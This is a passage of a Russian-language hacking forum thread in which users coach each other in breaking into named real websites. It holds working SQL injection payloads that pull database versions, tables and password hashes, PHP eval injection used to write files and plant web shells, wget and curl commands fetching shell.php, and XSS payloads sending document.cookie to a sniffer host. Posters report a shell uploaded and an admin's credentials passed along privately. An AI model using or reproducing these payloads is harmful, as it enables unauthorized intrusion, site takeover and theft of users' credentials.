ты функцию base64_decode передаешь стринг, почему не вижу кавычки? если mq on, тогда
bas64_decode($_GET[a]);&a=твой_base64_код


Делаю

http://www.site.com/index.php?s=10&id=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=

и тут

http://www.site.com/lala.php

все равно выводит

404.

Запрошенный Вами документ отсутствует на сервере.

Konqi
31.01.2012, 18:01
er9j6@ said:
Делаю
http://www.site.com/index.php?s=10&id=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=
и тут
http://www.site.com/lala.php
все равно выводит
404.
Запрошенный Вами документ отсутствует на сервере.


если твой бекдор принимает пост запросы, папробуй отправить данные POST-ом, по всей видимости там фильтр, или используй другие функции

er9j6@
31.01.2012, 18:04
Konqi said:
если твой бекдор принимает пост запросы, папробуй отправить данные POST-ом, по всей видимости там фильтр, или используй другие функции


Konqi

какие другие функции можно еще использовать?

Konqi
31.01.2012, 18:11
er9j6@ said:
Konqi
какие другие функции можно еще использовать?



можешь использовать системные комманды (если safe мод off), system,exec,shell_exec,passthru, залей через wget или curl, или что там еще есть

пример

system($_GET[a]);&a=wget http://site.ru/shell.php

или через принт, print(`curl http://site.ru/shell.php > ./shell.php`);

неоднакратно обсуждалось это тема

er9j6@
31.01.2012, 18:25
Konqi said:
можешь использовать системные комманды (если safe мод off), system,exec,shell_exec,passthru, залей через wget или curl, или что там еще есть
пример
system($_GET[a]);&a=wget http://site.ru/shell.php
или через принт, print(`curl http://site.ru/shell.php > ./shell.php`);
неоднакратно обсуждалось это тема


у меня в шаблоне записан eval, его что нужно заменить sistem?

ipsclass->input['cid'] = 1">

ipsclass->input['id'])">

Konqi
31.01.2012, 18:27
er9j6@ said:
у меня в шаблоне записан eval, его что нужно заменить sistem?
ipsclass->input['cid'] = 1">
ipsclass->input['id'])">



не надо ничем заменить, вместо file_put_contents, используйте те функции которые я написал

er9j6@ достаточно зафлудили в теме, листайте топик, уверен найдете все ответы на ваши вопросы

Ereee
31.01.2012, 18:29
er9j6@,

у тебя хостинг от мастерхост, смотрел phpinfo, там отключены системные функции.

Tr[1]x
31.01.2012, 18:33
Существуют ли аналоги Goolag Scanner?

И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.

Ereee
31.01.2012, 18:34
x"]
Tr[1]x said:
Существуют ли аналоги Goolag Scanner?
И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.


http://madnet.name/tools/madss/ , не?

er9j6@
31.01.2012, 18:39
Ereee said:
er9j6@
,
у тебя хостинг от мастерхост, смотрел phpinfo, там отключены системные функции.


В какой шаблон ты вписал этот код ? НЕ найду.

ipsclass->input['kod'] = 1">

ipsclass->input['pzdc'])">



Как я понимаю, ты нашел новый способ заливки шеллов в IPB

Ereee
31.01.2012, 18:42
er9j6@ said:
В какой шаблон ты вписал этот код ? НЕ найду.
ipsclass->input['kod'] = 1">
ipsclass->input['pzdc'])">

Как я понимаю, ты нашел новый способ заливки шеллов в IPB


https://rdot.org/forum/showpost.php?p=7037&postcount=12

Spot
31.01.2012, 19:07
Привет %Username%, вопрос в следующем нащупал sql иньекцию, и все впринципе нормально, но есть пару но:

Вытащить могу данные только одного юзверя, если укажу его айди например:


Code:
xxxx.php?wid=1&pid=-1+union+select+password+from +users +where uid =506

получаю пароль: %pass%

Но когда составляю запрос, что бы получить список всех юзверей, например:


Code:
.php?wid=2&pid=-1+union+select+email+from +users + group + by + uid+ desc

На что мне выдает стринг с текстом : Array

Так же проблема выдать комбинированный запрос:


Code:
.php?wid=2&pid=-1+union+select+email,uid+from +users where uid = 808

В ответ The used SELECT statements have a different number of columns

Буду рад просвещению, с иньекциями раньше никогда толком не работал, но вот пришлось.

stan0009
31.01.2012, 21:30
Задаю не в первый раз.

Вопрос насчет каким парсером пользуетесь, товарищи, для sql инъекции?.

Актуально

PS: sql poizon сломался, в гугл парсерах смысла не вижу, так как банит.

faza02
31.01.2012, 21:47
И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.


ну а как, пробуй все те же методы что и в админ панель.

http://www.forum.antichat.net/showthread.php?p=2935725

Spot, а что мешает через лимит спарсить?

или если массово, пробуй GROUP_CONCAT()

только тут ограничение на кол-во выводимых данных, по умлочанию — 1024


Так же проблема выдать комбинированный запрос:
union+select+email,uid+from +users where uid = 808


правильный синтаксис такой — concat_ws(0x3a,email,uid)

или concat

stan0009, попробуй Яшкалюб, а чекать на скули sqlndm

Tr[1]x
31.01.2012, 23:41
Подскажите какую-нибудь программу, похожую на Radmin, но чтобы она работала на ос FreeBSD.

winstrool
31.01.2012, 23:44
faza02 said:
ну а как, пробуй все те же методы что и в админ
правильный синтаксис такой — concat_ws(0x3a,email,uid)
или concat
stan0009
, попробуй Яшкалюб, а чекать на скули sqlndm


тут concat_ws() не причем хотя очень полезная функция, тут uid надо задать в хексе или в кавычки если не экранируется,

вот пример:


.php?wid=2&pid=-1+union+select+email,uid+from +users+where+uid=0x383038




.php?wid=2&pid=-1+union+select+concat_ws(0x3a,email,uid),2+from +users+where+uid=0x383038

pirat0
01.02.2012, 15:23
http://mastiff-dog.com/index.php?PageT=ReadNews&act=Empty&ID=-87

ребята прошу просто посмотреть есть ли тут инъекцыя??

Gaben7
01.02.2012, 15:40
Можно ли через эту информацию взломать или залить шелл


https://www.beadedpatterns.com/phpinfo.php

Ereee
01.02.2012, 15:46
2pirat0,

не думаю.

2Gaben7,

если есть LFI, то можно залить шелл. А так, phpinfo(); дает представление, с чем ты имеешь дело. Узнаешь пути, отключенные функции и т.д.

pirat0
01.02.2012, 16:12
http://s-zon.org/pricelists_good.php?PriceLists&id_pl=29&id_g=170&c1=-1

вроде php-injection? но чет подставляю страницы - не читает, почему так??

Ereee
01.02.2012, 16:41
pirat0 said:
http://s-zon.org/pricelists_good.php?PriceLists&id_pl=29&id_g=170&c1=-1
вроде php-injection? но чет подставляю страницы - не читает, почему так??


Опять же не думаю, что там есть уязвимость. Возможно просто ошибка.

JorryGo
01.02.2012, 18:48
myadmin

Приветствую.

Как можно узнать версию phpmyadmin?

Qwert321
01.02.2012, 19:14
JorryGo said:
Приветствую.
Как можно узнать версию phpmyadmin?


http://сайт_нужный/phpmyadmin/ChangeLog

Ты это имел ввиду?

qaz
01.02.2012, 20:22
Народ, помогите скулю разкрутить,


http://biclopsgames.com/game.php?id=6


чтобы не ввёл ничего не меняется

M_script
01.02.2012, 21:30
qaz said:
Народ, помогите скулю разкрутить,
чтобы не ввёл ничего не меняется


http://biclopsgames.com/game.php?id=1+and+1=(select+1+from(select+count(*) ,concat(version(),floor(rand(0)*2))x+from+informat ion_schema.tables+group+by+x)a)--+

PowerLiMe
02.02.2012, 00:52
Нужна ваша помощь, имеется DLE сайт, версия 5.5, опробовал уже много способов заливки шелла, нечего не получилось. Опробовал добавление разрешение пхп, и хтчекс в конфиг, нечего не вышло и еще пару штук.

Если кто-то может помочь, буду рад

sl1k
02.02.2012, 01:10
подскажите в чем пробл.

id=-983 GROUP BY 2 -- через group выяснил что 2 поля

но когда делаю

id=-983 UNION SELECT 1,2

все равно пишет что Query failed: The used SELECT statements have a different number of columns

Konqi
02.02.2012, 01:11
sl1k said:
подскажите в чем пробл.
id=-983 GROUP BY 2 -- через group выяснил что 2 поля
но когда делаю
id=-983 UNION SELECT 1,2
все равно пишет что Query failed: The used SELECT statements have a different number of columns



несколько запросов, используйте error based метод

Boolean
02.02.2012, 01:13
sl1k said:
подскажите в чем пробл.
id=-983 GROUP BY 2 -- через group выяснил что 2 поля
но когда делаю
id=-983 UNION SELECT 1,2
все равно пишет что Query failed: The used SELECT statements have a different number of columns


пробуй UNION ALL SELECT 1,2

sl1k
02.02.2012, 01:20
Boolean said:
пробуй UNION ALL SELECT 1,2


результат тоже

c error based буду разбираться ибо новичок в sql пока

Киев
02.02.2012, 05:17
Такой вопрос

index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*

Таким запросом я могу просматривать хэши, меняя только значения limit,

а каким запросом можно перемаслать Юзверей?

Юго
02.02.2012, 05:34
Киев said:
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?


Ты имеешь ввиду логины ?

ну например так

index.php?kat=2&kp=-39+union+select+concat_ws(0x2F,login,pass)+from+us er+limit+0,1/*

вывод будет логин/хеш

или так

index.php?kat=2&kp=-39+union+select+concat(login,0x2F,pass)+from+user+ limit+0,1/*

вывод будет такой же

er9j6@
02.02.2012, 13:22
pirat0 said:
http://mastiff-dog.com/index.php?PageT=ReadNews&act=Empty&ID=-87
ребята прошу просто посмотреть есть ли тут инъекцыя??


В других параметрах

_http://mastiff-dog.com/index.php?PageT=ForSale&act=&CatID=-1+union+select+1,2,3,(select(@x)from(select(@x:=0x 00),(select(null)from(information_schema.columns)w here(table_schema!=0x696e666f726d6174696f6e5f73636 8656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table _schema,0x2e,table_name,0x3a,column_name))))x),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4+--+

er9j6@
02.02.2012, 15:23
пытаюсь создать файл

Powered by vBulletin® Version 3.8.5

file_put_contents('lala.php', '');

allow_url_include=Off

disable_functions=no value

magic_quotes_gpc=On

http://www.site.com/forum/faq.php?cmd=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=

выводит

Fatal error: Call to undefined function bas64_decode() in /var/www/site.com/forum/faq.php(329) : eval()'d code(1) : eval()'d code on line 1

что можно еще сделать?

Konqi
02.02.2012, 15:27
er9j6@

base64_decode

er9j6@
02.02.2012, 15:39
Konqi said:
er9j6@
base64_decode


http://www.site.com/forum/faq.php?cmd=base64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTsNCg==

все равно выводит

404 - Компонент не найден!

Ereee
02.02.2012, 15:43
2er9j6@,

vbulletin? Тогда смело ставь код пакованного WSO ~25kb. Потом лей как хочешь =)

er9j6@
02.02.2012, 15:52
Ereee said:
2er9j6@
,
vbulletin? Тогда смело ставь код пакованного WSO ~25kb. Потом лей как хочешь =)


а это как, научите?

Ereee
02.02.2012, 15:56
er9j6@ said:
а это как, научите?


Скачать запакованную версию WSO (https://rdot.org/forum/attachment.php?attachmentid=177&d=1317891888)

Скопируй оттуда код, вставь его туда, где ты вставил код в faq.php. Потом http://forum/faq.php => ??? => PROFIT!

UPD. И да, убери .

z0mbyak
02.02.2012, 15:57
А зачем такая конструкция base64_decode($_GET[a])?

Засунь шифровку в base64_decode, гет зачем?

er9j6@
02.02.2012, 16:06
z0mbyak said:
А зачем такая конструкция base64_decode($_GET[a])?
Засунь шифровку в base64_decode, гет зачем?


так тоже не проходит

http://www.site.com/forum/faq.php?cmd=base64_decode(ZmlsZV9wdXRfY29udGVudHMo J2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTsNCg==);

ответ

Parse error: syntax error, unexpected ')' in /var/www/site.com/forum/faq.php(329) : eval()'d code(1) : eval()'d code on line 1

er9j6@
02.02.2012, 16:27
Залил. Спасибо, Ereee

Konqi
02.02.2012, 16:28
z0mbyak said:
А зачем такая конструкция base64_decode($_GET[a])?
Засунь шифровку в base64_decode, гет зачем?



MQ on

Ereee
02.02.2012, 16:30
Konqi said:
MQ on


Он уже про другой сайт =)

Konqi
02.02.2012, 16:32
Ereee said:
Он уже про другой сайт =)


какой еще другой? последний пост с данными тут

/showpost.php?p=3004839&postcount=19408

Ereee
02.02.2012, 16:33
Konqi said:
какой еще другой? последний пост с данными тут
/showpost.php?p=3004839&postcount=19408


Ну так через админку VB вроде пофиг на MQ.

P.S. Стереть все посты вообщем...

Konqi
02.02.2012, 16:35
Ereee said:
Ну так через админку вроде пофиг на MQ.


О.о разница в чем? он передает данные через Mетод GET, и mq включено, интерпретатор одобряет админку или как?

никакой разницы

Ereee
02.02.2012, 16:39
Konqi said:
О.о разница в чем? он передает данные через Mетод GET, и mq включено, интерпретатор одобряет админку или как?


Зачем там мучатся с MQ, если в админке булки можно сразу сохранить другой код, чтоб всего этого не было. А с GET-ом ясно, я не это имел ввиду.

P.S. Я с UK. Сорри фор май Рашн

pirat0
02.02.2012, 19:28
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+

можно ли обойти вот такую вот фигнюшку??

Konqi
02.02.2012, 19:42
pirat0 said:
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??


проверяются вхождения в строке, врятли обойдешь

er9j6@
02.02.2012, 20:01
pirat0 said:
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??


Не слушай никого, все выводится

5.0.51a-24+lenny5:a28161_studyguid:a14801@localhost:debian-linux-gnu

Melfis
02.02.2012, 20:11
pirat0 said:
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??


http://www.studyguide.ru/library.php

?search=2

&form[name]=-1'+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3, 4,5--+

&form[word]=


er9j6@ said:
Не слушай никого, все выводится
5.0.51a-24+lenny5:a28161_studyguid:a14801@localhost:debian-linux-gnu


Интересно бы саму скуль увидеть или метод.

qaz
02.02.2012, 22:34
Подскажите как можно дальше вывесли какие либо данные


http://www.indexcopernicus.com/info.php?id=6)+union+select+1,2,3,4--+

Ereee
02.02.2012, 23:01
qaz said:
Подскажите как можно дальше вывесли какие либо данные


Error-based:


Code:
http://www.indexcopernicus.com/info.php?id=6)+and(select+1+from(select+count(*),c oncat((select+concat(table_name,0x00)+from+informa tion_schema.tables+limit+20,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)--+f

Result:


Code:
Duplicate entry 'users' for key 1

boortyhuhtyu
03.02.2012, 02:05
подскажите альтернативу Charles (http://www.charlesproxy.com/)

trololoman96
03.02.2012, 02:11
tamper data

boortyhuhtyu
03.02.2012, 02:14
не не тампер не пропрёт а уже всё тенкс.

Serrg
03.02.2012, 16:04
Здараствуйте, подскажите пожалуйста.. Нашел

http://vsetke.ru/registration/registration_form.jsp

xss При вставке в поля имя и пароль

">alert(/xss/)

Подскажи как можно вытащить куки ?

bodrich
03.02.2012, 16:21
http://www.poezia.ru/article.php?sid=65755+union+select+1--


Количество столбцов 1, но почему ошибку все равно выдает ?

pirat0
03.02.2012, 16:25
bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?


попробуй вывод в ошибке, там походу нет вывода столбцов вот так крути

http://www.poezia.ru/article.php?sid=65755+and(select+count(*)+from+inf ormation_schema.tables+group+by(concat(version(),0 x00,floor(rand(0)*2))))--+

Ereee
03.02.2012, 16:27
bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?




Code:
http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+cou nt(*),concat((select+version()),0x00,floor(rand(0) *2))x+from+information_schema.tables+group+by+x)a)--+f



Code:
Duplicate entry '5.0.27' for key 1



Code:
http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+cou nt(*),concat((select+concat(table_name,0x3a,column _name,0x00)+from+information_schema.columns+limit+ 0,1),floor(rand(0)*2))x+from+information_schema.ta bles+group+by+x)a)--+f



Code:
Duplicate entry 'CHARACTER_SETS:CHARACTER_SET_NAME' for key 1

Ereee
03.02.2012, 16:42
pirat0 said:
">javascript:src=http://'sniffer.com?'+document.cookie;"
как-то так вроде помнится))




Code:
img = new Image(); img.src = "http://sniffer?"+document.cookie;
location.href = "http://sniffer?" + document.cookie;

M_script
03.02.2012, 16:43
PHP:
">(new Image()).src='http://site.com/sniffer.php?'+document.cookie

Можно отправлять GET-запросом


http://vsetke.ru/registration/registration_form.jsp?email_address=">(new Image()).src='http://site.com/sniffer.php?'%2bdocument.cookie


Вставляешь на свой сайт скрытый фрейм


PHP:
(new Image()).src='http://site.com/sniffer.php?'+document.cookie">

Когда юзер зайдет на сайт, куки отправятся на сниффер. В IE и хроме этот вариант не сработает из-за фильтров.

p.s.:

В этом примере используется GET-запрос, потому что реализация атаки проще. Но если есть возможность, лучше использовать POST-запрос для эксплуатации XSS.

M_script
03.02.2012, 16:46
bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?


Потому что несколько запросов к базе. В первом один столбец, во втором больше.

qaz
03.02.2012, 17:47
что можно сделать в подобном случае?


http://www.bluegrassmidwest.com/details.php?id=2+or+1+group+by+concat%28%28select+ version%28%29%29,floor%28rand%280%29*2%29%29having +min%280%29+or+1--+


ответ

error setting cookie

pirat0
03.02.2012, 18:08
[CODE]
Code:
POSTDATA =-----------------------------114782935826962
Content-Disposition: form-data; name="f[id]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[galery_id]"

1565
-----------------------------114782935826962
Content-Disposition: form-data; name="f[order_id]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_ru]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_en]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_ua]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[img_small]"; filename=""
Content-Type: application/octet-stream

-----------------------------114782935826962
Content-Disposition: form-data; name="f[img_big]"; filename="d00m.php"
Content-Type: unknown/unknown

pirat0
03.02.2012, 19:25
qaz said:
что можно сделать в подобном случае?
ответ
error setting cookie


http://www.bluegrassmidwest.com/details.php?id=6'and(0)/*--*/order/*--*/by/*--*/10/*)

вот столбцы можно подобрать, но потом как только вставляеш в запрос union все валится, походу какой то фильтр, UNiOn такого типа тоже не канает((, может еще у кого какие идеи будут??

Ereee
03.02.2012, 19:37
pirat0 said:
http://www.bluegrassmidwest.com/details.php?id=6'and(0)/*--*/order/*--*/by/*--*/10/*)
вот столбцы можно подобрать, но потом как только вставляеш в запрос union все валится, походу какой то фильтр, UNiOn такого типа тоже не канает((, может еще у кого какие идеи будут??


У тебя запятые фильтруется. Вместо пробела юзай /**/, а комментарии /*. Пока такой вид:


Code:
http://www.bluegrassmidwest.com/details.php?id=6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/2)y/**/join(select/**/3)z/*



Code:
The used SELECT statements have a different number of columns

Сейчас докрутим

UPD.


Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/version())y/**/join(select/**/user())z/**/join(select/**/database())a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*



Code:
5.0.22:web115u1@localhost:web115db1

Удачи

qaz
03.02.2012, 20:26
Ereee said:
Удачи


добавил

table_name+from+information_schema.tables


http://www.bluegrassmidwest.com/details.php?id=-6%27/**/union/**/select/**/*/**/from/**/%28select/**/1%29x/**/join/**/%28select/**/table_name+from+information_schema.tables%29y/**/join%28select/**/user%28%29%29z/**/join%28select/**/version%28%29%29a/**/join%28select/**/5%29b/**/join%28select/**/6%29c/**/join%28select/**/7%29d/**/join%28select/**/8%29e/**/join%28select/**/9%29f/**/join%28select/**/10%29g/**/join%28select/**/11%29h/*


и снова таже ошибка

winstrool
03.02.2012, 22:49
OxoTnik said:
Не пашет заливка шела через sql иньекцию
Делаю запрос
file_priv = Y
в чём дело не могу понять


во первых желатильней код шела в значение хекс преоброзовать, во вторых убедись что кавычки не фильтруются и не слешируются...

Ereee
03.02.2012, 22:56
qaz said:
и снова таже ошибка




Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/version())y/**/join(select/**/table_name/**/from/**/information_schema.tables)z/**/join(select/**/database())a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*



Code:
CHARACTER_SETS

Но мы не сможем юзать /**/limit/**/0,1. Ведь там запятая, которая фильтруется.

Поэтому попробуем group_concat:


Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/)y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*

Видим members.

Еще один ньюанс. Оказывается, что фильтруется и "=". Т.e. where/**/table_name='members' юзать невозможно. Но зато есть LIKE:


Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'members')y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*



Code:
memberID,lname,fname,email

и т.д.

P.S. Можно еще в XSS превратить:


Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/%3Cscript%3Ealert('Privet!')%3C/script%3E/**/from/**/members)y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*


2OxoTnik,


Code:
+union+select+1,2,'',4,5,6,7,8+into+outfile+'/var/www/shell.php'--

Папка доступна на запись? При выполнении error не выскакивает? Если да, то ищи другие папки. Проверь MQ.

kravch_v
03.02.2012, 23:21
OxoTnik said:
Не пашет заливка шела через sql иньекцию
Делаю запрос
file_priv = Y
в чём дело не могу понять




Code:
select '' from table_name into outfile '/var/www/shell.php';

или попробуй так:


Code:
select '' from mysql.user into outfile '/var/www/shell.php'

qaz
04.02.2012, 00:47
а вот такой вопрос, короче тут слепая скуля,

наугад в пару запросов нашол таблицу users и колонку passwd


http://www.pushkino-online.ru/auto_ads.php?aid=7+and+ascii%28substring%28%28sele ct%20passwd%20from%20users%20limit%200,1%29,1,1%29 %29=100


осталось добыть пароль, и тут возникла проблема,

через пхп скрипт немогу перебрать так как при откритии урала в ответе от сайта только ответ о том что неустановлен какойто плагин, хавидж не может ничего сделать, какие могут быть предложеня?

Unknown
04.02.2012, 12:38
qaz said:
хавидж не может ничего сделать, какие могут быть предложеня?


Если хавидж не берет, значит раскрутить это нельзя!!! XDDD

Какие тут могут быть предложения... Крути ручками или ищи еще какие-то программы (sqlmap, Toolza, даже не знаю какие еще существуют), иногда бывает проще написать скрипт для дампа самому.

З.Ы: Отправил логин-пароль админа в личку.

muljtik
04.02.2012, 12:54
Такая проблема, залил шел на сайт, зашёл на шел оказался в /home/gtrxuoxn/public_html/images/, далее перешёл в раздел /home/, а там около 3х тыщ сайтов и не на одном нельзя править править файлы даже не везде можно загрузить файл, что тут можно сделать??

Unknown
04.02.2012, 13:11
Попытайся получить root-права на этой машине (тебе Сюда (https://antichat.live/threads/296327/))

Выложи туда конфигурацию сервера согласно примеру из 1ого поста и возможно тебе помогут :3

M_script
04.02.2012, 13:25
muljtik, найди на сайтах папки с правами на запись и выполнение, залей туда шеллы.

Если крупные сайты, можно поискать баги в скриптах.